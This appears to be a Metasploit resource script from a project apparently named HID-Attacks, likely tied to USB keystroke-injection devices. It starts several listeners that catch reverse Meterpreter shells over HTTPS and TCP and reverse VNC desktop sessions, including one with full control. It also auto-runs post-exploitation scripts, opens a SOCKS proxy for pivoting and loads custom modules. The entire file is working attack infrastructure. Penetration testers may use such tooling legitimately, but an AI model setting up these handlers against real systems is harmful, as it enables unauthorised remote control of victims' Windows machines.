use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.101
set LPORT 13002
set ExitOnSession false
set AutoRunScript multi_console_command -rc /home/jhale/git/HID-Attacks/auto_test.rc
exploit -j

set PAYLOAD windows/meterpreter/reverse_https
set LPORT 13003
exploit -j

set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 13004
exploit -j

set PAYLOAD windows/meterpreter/reverse_https
set AutoRunScript multi_console_command -rc /home/jhale/git/HID-Attacks/teensy_test.rc
set LPORT 13008
exploit -j

set PAYLOAD windows/vncinject/reverse_tcp
set LPORT 13005
set ViewOnly false
exploit -j

set PAYLOAD windows/vncinject/reverse_tcp
set LPORT 13006
set ViewOnly true
exploit -j

use auxiliary/server/socks4a
set SVRHOST 127.0.0.1
set SVRPORT 1080
exploit -j

loadpath /home/jhale/git/HID-Attacks/msf-modules

